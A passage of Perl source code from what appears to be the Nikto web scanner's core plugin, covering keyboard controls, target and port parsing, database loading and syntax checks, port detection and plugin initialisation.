sleep($CLI{'pause'}) if (defined $CLI{'pause'});\n}\n\n###############################################################################\nsub safe_quit {\n    my ($mark) = @_;\n\n    $mark->{'end_time'} = time();\n    $mark->{'elapsed'}  = $mark->{'end_time'} - $mark->{'start_time'};\n\n    #if ($mark->{'start_time'} ne '') {\n    #report_host_end($mark);\n    #}\n\n    report_host_end($mark);\n    report_summary($mark);\n    report_close($mark);\n    $NIKTO{'POSIX'}{'term'}->setlflag($NIKTO{'POSIX'}{'oterm'}) if ($^O !~ /MSWin32/);;\n    exit(1);\n}\n\n###############################################################################\nsub check_input {\n    my ($mark) = @_;\n\n    my $key = readkey();\n    if ($key eq '') { return; }\n\n    if ($key eq ' ') {\n        status_report($mark);\n    }\n    elsif ($key eq 'v') {\n        if   ($OUTPUT{'verbose'}) { $OUTPUT{'verbose'} = 0; }\n        else                      { $OUTPUT{'verbose'} = 1; }\n    }\n    elsif ($key eq 'd') {\n        if   ($OUTPUT{'debug'}) { $OUTPUT{'debug'} = 0; }\n        else                    { $OUTPUT{'debug'} = 1; }\n    }\n    elsif ($key eq 'e') {\n        if   ($OUTPUT{'errors'}) { $OUTPUT{'errors'} = 0; }\n        else                     { $OUTPUT{'errors'} = 1; }\n    }\n    elsif ($key eq 'p') {\n        if   ($OUTPUT{'progress'}) { $OUTPUT{'progress'} = 0; }\n        else                       { $OUTPUT{'progress'} = 1; }\n    }\n    elsif ($key eq 'r') {\n        if   ($OUTPUT{'show_redirects'}) { $OUTPUT{'show_redirects'} = 0; }\n        else                             { $OUTPUT{'show_redirects'} = 1; }\n    }\n    elsif ($key eq 'c') {\n        if   ($OUTPUT{'show_cookies'}) { $OUTPUT{'show_cookies'} = 0; }\n        else                           { $OUTPUT{'show_cookies'} = 1; }\n    }\n    elsif ($key eq 'o') {\n        if   ($OUTPUT{'show_ok'}) { $OUTPUT{'show_ok'} = 0; }\n        else                      { $OUTPUT{'show_ok'} = 1; }\n    }\n    elsif ($key eq 'a') {\n        if   ($OUTPUT{'show_auth'}) { $OUTPUT{'show_auth'} = 0; }\n        else                        { $OUTPUT{'show_auth'} = 1; }\n    }\n    elsif (($key eq 'q') || (ord($key) eq 3)) {\n        safe_quit($mark);\n    }\n    elsif ($key eq 'P') {\n        status_report($mark);\n        pause();\n    }\n    elsif ($key eq 'N') {\n        nprint(\"- Terminating host scan.\");\n        return 'term';\n    }\n    return;\n}\n###############################################################################\nsub pause {\n\treturn if ($^O =~ /MSWin32/);\n    if ($_[0] eq 'u') {\n        nprint(\"- Pausing due to 'until' flag--press P to resume.\");\n    }\n    else {\n        nprint(\"- Pausing--press P to resume.\");\n    }\n\n    while (readkey() ne 'P') { $CLI{'until'} = ''; sleep 1; }\n    nprint(\"- Resuming.\");\n}\n###############################################################################\nsub readkey {\n    my $key;\n\treturn if ($^O =~ /MSWin32/);\n\n    $NIKTO{'POSIX'}{'term'}->setlflag($NIKTO{'POSIX'}{'noecho'});\n    $NIKTO{'POSIX'}{'term'}->setattr($NIKTO{'POSIX'}{'fd_stdin'}, TCSANOW);\n    eval {\n        local $SIG{ALRM} = sub { die; };\n        ualarm(1_000);\n        sysread(STDIN, $key, 1);\n        ualarm(0);\n    };\n    $NIKTO{'POSIX'}{'term'}->setlflag($NIKTO{'POSIX'}{'oterm'});\n    $NIKTO{'POSIX'}{'term'}->setattr($NIKTO{'POSIX'}{'fd_stdin'}, TCSANOW);\n\n    return $key;\n}\n\n###############################################################################\nsub resolve {\n    my $ident = $_[0] or return;\n    my ($ip, $name, $ipcache) = \"\";\n    my @addresses;\n\n    if (($CONFIGFILE{'PROXYHOST'} ne '') && $CLI{'useproxy'}) {\n        return $ident, $ident, $ident;\n    }\n\n    if ($ident =~ /[^0-9\\.]/)    # not an IP, assume name & resolve\n    {\n        if ($CLI{'skiplookup'}) {\n            print(\"+ ERROR: -nolookup set, but given name\\n\");\n            exit 1;\n        }\n\n    if ($hent = gethostbyname($ident)) {\n         # my $name      = $hent->name;  ## Future--report multiple names\n         my $addr_ref  = $hent->addr_list;\n         @addresses = map { inet_ntoa($_) } @$addr_ref;\n    }\n\n    $ip = $addresses[0];\n    if ($addresses[1] != \"\") {\n\t$ipcache = \"Multiple IP addresses found: $ip, \";\n\tfor (my $i=1; $i<=$#addresses; $i++) {\n\t\t$ipcache .= \"$addresses[$i], \";\n\t}\n        $ipcache =~ s/, $//;\n    }\n\n   if ($ip !~ /^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$/) {\n       nprint(\"+ ERROR: Invalid IP: $ip\\n\\n\");\n       exit 1;\n   }\n       $name = $ident;\n     }\n   else    # ident is IP\n    {\n        if ($ident !~ /^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$/) {\n            nprint(\"+ ERROR: Invalid IP: $ident\\n\\n\");\n            return;\n        }\n\n        $ip = $name = $ident;\n    }\n\n    my $displayname = ($name) ? $name : $ip;\n    return $name, $ip, $displayname, $ipcache;\n}\n\n###############################################################################\nsub set_targets {\n    my ($hostlist, $portlist, $ssl, $root) = @_;\n    my $host_ctr  = 1;\n    my @hosts     = split(/,/, $hostlist);\n    my @tempports = split(/,/, $portlist) if defined $portlist;\n    my (@ports, @checkhosts, @results, @marks);\n    my $defaultport = ($ssl) ? 443 : 80;\n\n    nprint(\"- Getting targets\", \"v\");\n\n    # Check for portlist and expand\n    foreach my $port (@tempports) {\n        if ($port =~ /-/) {\n            my ($start, $end);\n            my @temp = split(/-/, $port);\n            $start = $temp[0];\n            $end   = $temp[1];\n            if ($start eq \"\") { $start = 0; }\n            if ($end   eq \"\") { $end   = 65535; }\n            if ($start > $end) {\n                nprint(\"+ ERROR port range $port doesn't make sense - assuming 80/tcp\");\n                next;\n            }\n            for (my $i = $start ; $i <= $end ; $i++) {\n                push(@ports, $i);\n            }\n        }\n        else {\n            push(@ports, $port);\n        }\n    }\n\n    # no ports explicitly set, so use default port\n    if (scalar(@ports) == 0) {\n        push(@ports, $defaultport);\n    }\n\n    # check whether -h is a file or an entry\n    foreach my $host (@hosts) {\n        if (-e $host || $host eq \"-\") {\n            @results = parse_hostfile($host);\n            push(@checkhosts, @results);\n        }\n        else {\n            push(@checkhosts, $host);\n        }\n    }\n\n    # Now parse the list of checkhosts, store in %targs by host:port\n    my $targs = {};\n    foreach my $host (@checkhosts) {\n        $host =~ s/\\s+//g;\n        if ($host eq '') { next; }\n        my ($defhost, $defport) = '';\n\n        # is it a URL?\n        if ($host =~ /^https?:\\/\\//) {\n\n            if ($CLI{'ports'} ne '') {\n\t\tnprint(\"- ERROR: The -port option cannot be used with a full URI\");\n\t\texit 1;\n\t\t}\n            my @hostdata = LW2::uri_split($host);\n\n            $defhost = $hostdata[2];\n            $defport = $hostdata[3];\n            $targs{ $defhost . \":\" . $defport } = ($root ne \"\") ? $root : '/';\n\n            if (($hostdata[0] ne '/') && ($hostdata[0] ne '') && ($root eq '')) {\n                $hostdata[0] =~ s/\\/$//;\n                $targs{ $defhost . \":\" . $defport } = $hostdata[0];\n                nprint(\"- Added -root value of '$hostdata[0]' from URI\", \"v\");\n            }\n        }\n        else {\n            my @h = split(/\\:|\\,/, $host);\n            $defhost = $h[0];\n            $defport = $h[1];\n            $targs{ $defhost . \":\" . $defport } = ($root ne \"\") ? $root : '/';\n        }\n    }\n\n    foreach my $host (keys %targs) {\n        my ($h, $p) = split(/:/, $host);\n        if ($p eq '') {\n            foreach my $port (@ports) {\n                my $markhash = {};\n                if ($root ne '') {\n                    $markhash->{'root'} = $root;\n                    nprint(\"- Added -root value of '$root' from CLI\", \"v\");\n                }\n\n                $markhash->{'ident'} = $h;\n                $markhash->{'port'}  = $port;\n                if ($targs{$host} ne '/') { $markhash->{'root'} = $targs{$host}; }\n                nprint(\"- Target:$markhash->{'ident'} port:$markhash->{'port'}\", \"v\", $markhash);\n                push(@marks, $markhash);\n            }\n        }\n        else {\n            my $markhash = {};\n            if ($targs{$host} ne '/') { $markhash->{'root'} = $targs{$host}; }\n\n            $markhash->{'ident'} = $h;\n            $markhash->{'port'}  = $p;\n            push(@marks, $markhash);\n        }\n    }\n\n    return @marks;\n}\n\n###############################################################################\nsub load_databases {\n    my @dbs = qw/db_parked_strings db_404_strings  db_outdated  db_variables/;\n    my $prefix = $_[0] || '';\n\n    # Only load the right databases if -Userdbs is set\n    if ((defined($CLI{'userdbs'})) && ($CLI{'userdbs'} eq 'all')) {\n        if   ($prefix eq '') { return; }\n        else                 { push(@dbs, 'db_tests'); }\n    }\n    if (($prefix eq 'u') || (!defined($CLI{'userdbs'}))) { push(@dbs, 'db_tests'); }\n\n    # verify required files\n    for my $file (@dbs) {\n        if (!-r \"$CONFIGFILE{'DBDIR'}/$file\") {\n            nprint(\"+ ERROR: Can't find/read required file \\\"$CONFIGFILE{'DBDIR'}/$file\\\"\");\n            exit 1;\n        }\n    }\n\n    for my $file (@dbs) {\n        my $filename = $CONFIGFILE{DBDIR} . \"/\" . $prefix . $file;\n        if (!-r $filename) { next; }\n\tnprint(\"- Loading DB: $filename\",\"d\");\n        open(IN, \"<$filename\") || die nprint(\"+ ERROR: Can't open \\\"$filename\\\":$@\\n\");\n\n        # db_tests\n        if ($file =~ /u?db_tests/) { push(@DBFILE, <IN>); next; }\n\n        # all the other files require per-line processing\n        else {\n            my @file;\n\n            # Cleanup\n            while (<IN>) {\n                chomp;\n                $_ =~ s/#.*$//;\n                $_ =~ s/\\s+$//;\n                $_ =~ s/^\\s+//;\n                if ($_ ne \"\") { push(@file, $_); }\n            }\n\n            # db_variables\n            if ($file =~ /u?db_variables/) {\n                foreach my $l (@file) {\n                    if ($l =~ /^@/) {\n                        next if $l eq '';\n                        my @temp = split(/=/, $l);\n                        $VARIABLES{ $temp[0] } .= \"$temp[1]\";\n                    }\n                }\n            }\n\n            # db_parked_strings\n            elsif ($file =~ /u?db_parked_strings/) {\n                foreach my $l (@file) {\n                    $l = validate_and_fix_regex($l);\n                    $VARIABLES->{'PARKEDSTRINGS'}->{$l} = 1;\n                }\n            }\n\n            # db_404_strings\n            elsif ($file =~ /u?db_404_strings/) {\n                foreach my $l (@file) {\n                    if ($l =~ /^\\@CODE=/) {\n                        $l =~ s/^\\@CODE=//;\n                        $l = validate_and_fix_regex($l);\n                        $VARIABLES->{'ERRCODES'}->{$l} = 1;\n                    }\n                    else {\n                        $l = validate_and_fix_regex($l);\n                        $VARIABLES->{'ERRSTRINGS'}->{$l} = 1;\n                    }\n                }\n            }\n\n            # db_outdated\n            elsif ($file =~ /u?db_outdated/) {\n                foreach my $l (@file) {\n                    my @T = parse_csv($l);\n                    next if $T[1] eq '';\n                    $T[1]                    = validate_and_fix_regex($T[1]);\n                    $OVERS{ $T[1] }{ $T[2] } = $T[3];\n                    $OVERS{ $T[1] }{'tid'}   = $T[0];\n                }\n            }\n\n            close(IN);\n        }\n    }\n\n    return;\n}\n\n###############################################################################\nsub check_dbs {\n    @dbs = dirlist($CONFIGFILE{'DBDIR'}, \"^u?db_*\");\n    my %ALL_IDS;\n\n    for my $file (@dbs) {\n        my $filename = $CONFIGFILE{DBDIR} . \"/\" . $prefix . $file;\n        if (!-r $filename) {\n            nprint(\"+ ERROR: Unable to read \\\"$filename\\\"\");\n            next;\n        }\n        open(IN, \"<$filename\") || die nprint(\"+ ERROR: Can't open \\\"$filename\\\":$@\\n\");\n        nprint(\"Syntax Check: $filename\");\n\n        if ($file =~ /u?db_outdated/) {\n            my $count=0;\n            my %BANNER;\n            foreach $line (<IN>) {\n                $line =~ s/^\\s+//;\n                if ($line =~ /^\\#/) { next; }\n                chomp($line);\n                if ($line eq \"\" || $line =~ /\"nikto_id\"/) { next; }\n                $count++;\n                my @L = parse_csv($line);\n                if ($#L ne 3) { nprint(\"\\t+ ERROR: Invalid syntax ($#L): $line\"); next; }\n                if (($L[0] ne 0) && exists($ALL_IDS{$L[0]})) {\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $L[0]\");\n                }\n                else { $ALL_IDS{$L[0]}=1; }\n                if (exists($BANNER{$L[1]}) && $L[0] !~ /(600067|600068|601085)/i) {\n                    nprint(\"\\t+ ERROR: Duplicate Server Banner: $line\");\n                    nprint(\"\\t+ If this expected/needed: Please add the ID $L[0] at line \" . (__LINE__-2) . \" in the nikto_core.plugin.\");\n                }\n                else { $BANNER{$L[1]}=1; }\n            }\n            nprint(\"\\t$count entries\");\n        }\n        elsif ($file =~ /u?db_favicon/ || $file =~ /u?db_domino/) {\n            my $counter=0;\n            my %ENTRY;\n            foreach $line (<IN>) {\n                $line =~ s/^\\s+//;\n                if ($line =~ /^\\#/) { next; }\n                chomp($line);\n                if ($line eq \"\" || $line =~ /\"nikto_id\"/) { next; }\n                $counter++;\n                my @L = parse_csv($line);\n                if ($#L ne 2) { nprint(\"\\t+ ERROR: Invalid syntax ($#L): $line\"); next; }\n                if (($L[0] ne 0) && exists($ALL_IDS{$L[0]})) {\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $L[0]\");\n                }\n                else { $ALL_IDS{$L[0]}=1; }\n                if (exists($ENTRY{$L[1]})) {\n                    nprint(\"\\t+ ERROR: Duplicate entry: $line\");\n                }\n                else { $ENTRY{$L[1]}=1; }\n            }\n            nprint(\"\\t$counter entries\");\n        }\n        elsif ($file =~ /u?db_drupal/) {\n            my $counter=0;\n            my %ENTRY;\n            foreach $line (<IN>) {\n                $line =~ s/^\\s+//;\n                if ($line =~ /^\\#/) { next; }\n                chomp($line);\n                if ($line eq \"\" || $line =~ /\"nikto_id\"/) { next; }\n                $counter++;\n                my @L = parse_csv($line);\n                if ($#L ne 1) { nprint(\"\\t+ ERROR: Invalid syntax ($#L): $line\"); next; }\n                if (($L[0] ne 0) && exists($ALL_IDS{$L[0]})) {\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $L[0]\");\n                }\n                else { $ALL_IDS{$L[0]}=1; }\n                if (exists($ENTRY{$L[1]})) {\n                    nprint(\"\\t+ ERROR: Duplicate entry: $line\");\n                }\n                else { $ENTRY{$L[1]}=1; }\n            }\n            nprint(\"\\t$counter entries\");\n        }\n        elsif ($file =~ /u?db_dir_traversal/) {\n            my $counter=0;\n            my %ENTRY;\n            foreach $line (<IN>) {\n                $line =~ s/^\\s+//;\n                if ($line =~ /^\\#/) { next; }\n                chomp($line);\n                if ($line eq \"\" || $line =~ /\"nikto_id\"/) { next; }\n                $counter++;\n                my @L = parse_csv($line);\n                if ($#L ne 3) { nprint(\"\\t+ ERROR: Invalid syntax ($#L): $line\"); next; }\n                if (($L[0] ne 0) && exists($ALL_IDS{$L[0]})) {\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $L[0]\");\n                }\n                else { $ALL_IDS{$L[0]}=1; }\n                if (exists($ENTRY{$L[1]})) {\n                    nprint(\"\\t+ ERROR: Duplicate entry: $line\");\n                }\n                else { $ENTRY{$L[1]}=1; }\n                if ($L[2] !~ /(\\@TRAVWIN|\\@TRAVLIN|\\@TRAVALL)/) {\n                    nprint(\"\\t+ ERROR: Invalid or missing placeholder: $line\");\n                }\n            }\n            nprint(\"\\t$counter entries\");\n        }\n        elsif ($file =~ /u?db_tests/) {\n            my %ENTRIES;\n            foreach my $line (<IN>) {\n                chomp($line);\n                $line =~ s/^\\s+//;\n                if ($line =~ /^\\#|^$/) { next; }\n                my @L = parse_csv($line);\n                if (($L[4] !~ /(GET|POST|TRACE|TRACK|OPTIONS|SEARCH|INDEX)/i)\n                    && ($L[0] ne '006433')) {\n                    nprint(\"\\t+ ERROR: Possibly invalid method: $L[4] on ($line)\");\n                }\n                if ($L[5] eq \"\") { nprint(\"\\t+ ERROR: blank conditional: $line\"); next; }\n                if ($line !~ /^\\\".*\\\",\\\".*\\\",\\\".*\\\",\\\".*\\\",\\\".*\\\"/) {\n                    nprint(\"\\t+ ERROR: Invalid syntax ($#L): $line\");\n                    next;\n                }\n                if ($line !~ /^(\\\".*\\\",){11}\\\".*\\\"/) {\n                    nprint(\"\\t+ ERROR: Invalid syntax ($#L): $line\");\n                    next;\n                }\n                if (($L[3] =~ /^\\@CG/) && ($L[3] !~ /^\\@CGIDIRS/)) {\n                    nprint(\"\\t+ ERROR: Possible \\@CGIDIRS misspelling: $line\");\n                }\n\n                $ENTRIES{\"$L[3],$L[4],$L[5],$L[6],$L[7],$L[8],$L[9],$L[11],$L[12]\"}++;\n                if ((count_fields($line, 1) ne 12) && (count_fields($line) ne '')) {\n                    nprint(\"\\t+ ERROR: Invalid syntax: $line\");\n                }\n                for (my $i = 5 ; $i <= 9 ; $i++) {\n                    my ($result, $bad) = validate_and_fix_regex($L[$i], 1);\n                    if ($bad) { nprint(\"\\t+ ERROR: Invalid regex in field $i: \\\"$L[$i]\\\", line: $line\"); }\n                }\n                if (($L[0] ne 0) && exists($ALL_IDS{$L[0]})) {\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $L[0]\");\n                }\n                else {\n                    $ALL_IDS{$L[0]}=1;\n                }\n                if ($L[2] eq \"\" || $L[2] =~ /[^a-f0-9]/) {\n                    nprint(\"\\t+ ERROR: Invalid Tuning Type: $line\");\n                }\n                if ($L[3] =~ '^(/@|//)' && $L[0] !~ /(000396|000447|000543|000544|000545|000928|000929|001208|001373|001497|002761|002762|003029|007152)/i) {\n                    nprint(\"\\t+ ERROR: Possible incorrect slashes: $line\");\n                    nprint(\"\\t+ If two or more slashes are needed for this test: Please add the ID $L[0] at line \" . (__LINE__-2) . \" in the nikto_core.plugin.\");\n                }\n                if ($L[3] =~ '^@[A-Z]+/' && $L[0] !~ /(003348|003349)/i) {\n                    nprint(\"\\t+ ERROR: Possible incorrect slash after \\@VARIABLE: $line\");\n                    nprint(\"\\t+ If this slash is needed for this test: Please add the ID $L[0] at line \" . (__LINE__-2) . \" in the nikto_core.plugin.\");\n                }\n                if ((($L[4] ne 'POST') && ($L[4] ne 'SEARCH')) && ($L[11] ne '')) {\n                    # Some test IDs need this\n                    if ($L[0] !~ /(006992|000126|000291|001153)/i) {\n                        nprint(\"\\t+ ERROR: Possible incorrect use of POST data without POST method on line: $line\");\n                        nprint(\"\\t+ If the POST data is needed for this test: Please add the ID $L[0] at line \" . (__LINE__-2) . \" in the nikto_core.plugin.\");\n                    }\n                }\n            }\n            foreach $entry (keys %ENTRIES) {\n                if ($ENTRIES{$entry} > 1) {\n                    nprint(\"\\t+ ERROR: Duplicate Check Syntax ($ENTRIES{$entry}): $entry\");\n                }\n            }\n            nprint(\"\\t\" . keys(%ENTRIES) . \" entries\");\n        }\n        elsif ($file =~ /u?db_variables/) {\n            my $ctr = 0;\n            foreach $line (<IN>) {\n                if ($line !~ /^\\@/)         { next; }\n                if ($line !~ /^\\@.+\\=.+$/i) { nprint(\"\\t+ ERROR: Invalid syntax: $line\"); }\n                $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n        elsif ($file =~ /u?db_404_strings/ || $file =~ /u?db_dictionary/) {\n            my $ctr = 1;\n            my %STRINGS;\n            foreach $line (<IN>) {\n                chomp($line);\n                $line =~ s/\\#.*$//;\n                next if $line eq '';\n                my ($result, $bad) = validate_and_fix_regex($line, 1);\n                if ($bad) { nprint(\"\\t+ ERROR: Invalid regex on line $ctr: \\\"$line\\\"\"); }\n                if (exists($STRINGS{$line})) {\n                        nprint(\"\\t+ ERROR: Duplicate String: $line\");\n                        }\n                else { $STRINGS{$line}=1; }\n                $ctr++;\n            }\n            $ctr--;\n            nprint(\"\\t$ctr entries\");\n        }\n        elsif ($file =~ /u?db_parked_strings/) {\n            my $ctr = 1;\n            foreach $line (<IN>) {\n                chomp($line);\n                $line =~ s/\\#.*$//;\n                next if $line eq '';\n                my ($result, $bad) = validate_and_fix_regex($line, 1);\n                if ($bad) { nprint(\"\\t+ ERROR: Invalid regex on line $ctr: \\\"$line\\\"\"); }\n                $ctr++;\n            }\n            $ctr--;\n            nprint(\"\\t$ctr entries\");\n        }\n        elsif ($file =~ /u?db_headers/) {\n            my $ctr = 0;\n            my %HEADERS;\n            foreach $line (<IN>) {\n\t\tchomp($line);\n                $line =~ s/\\#.*$//;\n                next if $line eq '';\n                if ((count_fields($line) ne 0) && (count_fields($line) ne '')) {\n                    nprint(\"\\t+ ERROR: Invalid syntax: $line\");\n                }\n                if (exists($HEADERS{$line})) {\n                        nprint(\"\\t+ ERROR: Duplicate Header: $line\");\n                        }\n                else { $HEADERS{$line}=1; }\n                $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n        elsif ($file =~ /u?db_multiple_index/) {\n            my $ctr = 0;\n            foreach $line (<IN>) {\n                if ((count_fields($line) ne 0) && (count_fields($line) ne '')) {\n                    nprint(\"\\t+ ERROR: Invalid syntax: $line\");\n                }\n                $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n        else {\n            # It's a file of standard DB type, we can do this intelligently\n            my (@headers, @regex_fields);\n            my $ctr = 0, $fields = 0;\n            foreach $line (<IN>) {\n                $line =~ s/^#.*//;\n                next if $line eq \"\";\n                # first, grab the headers\n                if ($fields == 0) {\n                    @headers = parse_csv($line);\n                    $fields  = $#headers;\n\n                    # check regex fields for syntax\n                    for (my $i = 0 ; $i <= $#headers ; $i++) {\n                        if (   ($headers[$i] eq 'match')\n                            || ($headers[$i] eq 'matchstring')\n                            || ($headers[$i] eq 'server')) {\n                            push(@regex_fields, $i);\n                        }\n                    }\n                    next;\n                }\n\n\t\tchomp($line);\n                next if $line eq \"\";\n                my @entry = parse_csv($line);\n                if ($regex_fields[0] ne '') {\n                    foreach my $f (@regex_fields) {\n                        my ($result, $bad) = validate_and_fix_regex($entry[$f], 1);\n                        if ($bad) {\n                            nprint(\"\\t+ ERROR: Invalid regex in field $f on line $ctr: \\\"$line\\\"\");\n                        }\n                    }\n                }\n\n                if (   (count_fields($line, 1) != $fields - 1)\n                    && (count_fields($line) ne '')) {\n                    nprint(\"\\t+ ERROR: Invalid syntax: $line\");\n                }\n\n                if (($entry[0] ne 0) && exists($ALL_IDS{$entry[0]})) {\n                        nprint(\"\\t+ ERROR: Duplicate Test ID: $entry[0]\");\n                        }\n                else { $ALL_IDS{$entry[0]}=1; }\n\n            $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n\n        close(IN);\n    }\n\n    # Try to grab the test IDs from plugins to check for duplicates. Not foolproof.\n    nprint(\"Checking plugins for duplicate test IDs\");\n    my @pluginlist = dirlist(\"$CONFIGFILE{'PLUGINDIR'}\", '\\.plugin$');\n    foreach my $pf (@pluginlist) {\n\topen(PF,\"<$CONFIGFILE{'PLUGINDIR'}/$pf\") || die print STDERR \"+ ERROR: Unable to open '$pf': $@\\n\";\n\tmy @file=<PF>;\n\tclose(PF);\n  \tmy @adds= grep(/add_vulnerability\\(/, @file);\n\tforeach my $addv (@adds) {\n\t\tchomp($addv);\n\t\tmy @bits = parse_csv($addv);\n\t\t$bits[2] =~ s/\\s+//g;\n\t\tif ($bits[2] =~ /^[\\d]+$/) {\n                \tif (($bits[2] ne 0) && exists($ALL_IDS{$bits[2]})) {\n                        nprint(\"\\t+ ERROR: Duplicate Test ID: $bits[2]\");\n                        }\n                \telse { $ALL_IDS{$bits[2]}=1; }\n\t\t\t}\n\t\t}\n\t}\n\n    # Look for bad/invalid IDs\n    foreach my $id (keys %ALL_IDS) {\n\tchomp($id);\n\tnext if (($id eq 0) || ($id eq '') || ($id eq 'nikto_id'));\n\tif ($id =~ /[^\\d]/) { nprint(\"+ERROR: Invalid test ID: $id\"); next; }\n\tif (length($id) < 6) {  nprint(\"+WARNING: Possibly invalid test ID: $id\"); }\n\t}\n\n    # Suggest some open IDs\n    my $open=();\n    my $id='000001';\n    while ($#open < 6) {\n                if (!exists($ALL_IDS{$id})) { push(@open,$id); }\n \t\t$id++;\n\t\t}\n    nprint(\"\\nSome (probably) open IDs: \" . join(\", \",@open) );\n\n    nprint(\"\\n\");\n    exit 1;\n}\n\n###############################################################################\nsub count_fields {\n    my $line    = $_[0] || return;\n    my $checkid = $_[1] || 0;\n    if ($line !~ /^\\\"/) { return; }\n    chomp($line);\n    $line =~ s/\\s+$//;\n    if ($line eq '') { return; }\n    my @L = parse_csv($line);\n    if ($checkid && ($L[0] ne 'nikto_id') && (($L[0] =~ /[^0-9]/) || ($L[0] eq ''))) { return -1; }\n    return $#L;\n}\n\n###############################################################################\nsub port_check {\n    my ($start_time, $hostname, $ip, $port, $key, $cert, $vhost) = @_;\n    my $m = {};\n\n    # Check SKIPPORTS\n    if ($CONFIGFILE{'SKIPPORTS'} =~ /\\b$port\\b/) {\n        nprint(\"+ ERROR: SKIPPORTS (nikto.conf) contains $port -- not checking\");\n        return 0;\n    }\n\n    $m->{'start_time'} = $start_time;\n    $m->{'hostname'} = $vhost || $hostname;\n    $m->{'ip'}       = $ip;\n    $m->{'port'}     = $port;\n    $m->{'ssl'}      = 0;\n\n    my @checktypes;\n    if ($CLI{'nossl'}) { @checktypes = ('HTTP'); }\n    elsif ($CLI{'ssl'}) { @checktypes = ('HTTPS'); }\n    elsif ($port == 80) { @checktypes = ('HTTP', 'HTTPS'); }\n    else { @checktypes = ('HTTPS', 'HTTP'); }\n\n    foreach my $method (split(/ /, $CONFIGFILE{'CHECKMETHODS'})) {\n        $request{'whisker'}->{'method'} = $method;\n        foreach my $checkssl (@checktypes) {\n            nprint(\"- Checking for $checkssl on port \"\n                     . ($m->{'hostname'} || $m->{'ip'})\n                     . \":$port, using $method\",\n                   \"v\",\n                   $m\n                   );\n            $m->{ssl} = ($checkssl eq \"HTTP\") ? 0 : 1;\n            if ($m->{'ssl'}) {\n                $m->{'key'}  = $key;\n                $m->{'cert'} = $cert;\n            }\n            proxy_check($m);\n            my ($res, $content, $error, $request, $response) = nfetch($m, \"/\", $method, \"\", \"\", { noerror => 1, noprefetch => 1, nopostfetch => 1 }, \"Port Check\");\n\n            if ($res) {\n\n      # this will fix for some Apaches that are annoying enough to answer non TLS reqs on an TLS server\n                if (defined $content\n                    && ( $content =~ /plain HTTP to an SSL/ ||\n\t\t\t\t\t     $content =~ /plain HTTP request was sent to HTTPS/ )) {\n                    dump_var(\"Result Hash\", \\%result);\n                    next;\n                }\n                nprint(\"- $checkssl Server found: \"\n                         . ($m->{'hostname'} || $m->{'ip'})\n                         . \":$port \\t$response->{server}\",\n                       \"d\",\n                       $m\n                       );\n                return $m->{'ssl'} + 1;\n            }\n        }\n    }\n\n    add_vulnerability($m,\"No web server found on \" . ($hostname || $ip) . \":$port\", '000029', '0', '', '/', $request, $response, \"No HTTP response\");\n    nprint(\"---------------------------------------------------------------------------\");\n\n    return 0;\n}\n\n###############################################################################\n# Directory listing\nsub dirlist {\n    my $DIR     = $_[0] || return;\n    my $PATTERN = $_[1] || \"\";\n    my @FILES_TMP = ();\n\n    opendir(DIRECTORY, $DIR) || die print STDERR \"+ ERROR: Can't open directory '$DIR': $@\";\n    foreach my $file (readdir(DIRECTORY)) {\n        if ($file =~ /^\\./) { next; }    # skip hidden files, '.' and '..'\n        if ($PATTERN ne \"\") {\n            if ($file =~ /$PATTERN/) { push(@FILES_TMP, $file); }\n        }\n        else { push(@FILES_TMP, $file); }\n    }\n    closedir(DIRECTORY);\n\n    return @FILES_TMP;\n}\n\n###############################################################################\nsub load_plugins {\n    my @pluginlist = dirlist(\"$CONFIGFILE{'PLUGINDIR'}\", '\\.plugin$');\n    my @all_names;\n\n    # populate plugin macros\n    $CONFIGFILE{'@@NONE'} = \"\";\n\n    # Check if running plugins is NONE - if so, don't bother initialising plugins\n    if ($CLI{'plugins'} eq '@@NONE') {\n        return;\n    }\n\n    foreach my $plugin (@pluginlist) {\n        my $plugin_name = $plugin;\n        $plugin_name =~ s/\\.plugin$//;\n        my $plugin_init = $plugin_name . \"_init\";\n        eval { require \"$CONFIGFILE{'PLUGINDIR'}/$plugin\"; };\n        if ($@) {\n            nprint(\"- Could not load or parse plugin: $plugin_name\\n Error: \");\n            warn $@;\n            nprint(\"- The plugin could not be run.\");\n        }\n        else {\n            nprint(\"- Initialising plugin $plugin_name\", \"v\");\n\n            # Call initialisation method\n            if (defined &$plugin_init) {\n                my $pluginhash = &$plugin_init;\n\n                # Add default weights if not already assigned\n                while (my ($hook, $hook_params) = each(%{ $pluginhash->{'hooks'} })) {\n                    $hook_params->{$hook}->{'weight'} = 50\n                      unless (defined $hook_params->{$hook}->{'weight'});\n                }\n                $pluginhash->{report_weight} = 50 unless (defined $pluginhash->{report_weight});\n                push(@all_names, $pluginhash->{name});\n\n                push(@PLUGINS, $pluginhash);\n                nprint(\"- Loaded \\\"$pluginhash->{full_name}\\\" plugin.\", \"v\");\n            }\n           else {\n\t\tnprint(\"WARNING: No init found for $plugin_name\\n\",\"d\");\n\t\t}\n        }\n    }\n    $CONFIGFILE{'@@ALL'} = join(';', @all_names);\n    my @torun = split(/;/, expand_pluginlist($CLI{'plugins'}, 0));\n    # Force-enable report plugins if needed\n    if (($CLI{'file'} ne '') && ($CLI{'plugins'} =~/\\@NONE/)) {\n\tpush(@torun,'report_csv') if $CLI{'file'} =~ /csv/i;\n\tpush(@torun,'report_json') if $CLI{'file'} =~ /json/i;\n\tpush(@torun,'report_html') if $CLI{'file'} =~ /html?/i;\n\tpush(@torun,'report_nbe') if $CLI{'file'} =~ /nbe/i;\n\tpush(@torun,'report_sqlg') if $CLI{'file'} =~ /sqlg/i;\n\tpush(@torun,'report_text') if $CLI{'file'} =~ /txt/i;\n\tpush(@torun,'report_xml') if $CLI{'file'} =~ /xml/i;\n\t}\n\n    # Second pass to ensure that @@ALL is configured\n    foreach my $plugin (@PLUGINS) {\n\n        # Check that the plugin is to be run\n        # Perl doesn't allow us to use \"in\", pity\n        foreach my $torun_plugin (@torun) {\n    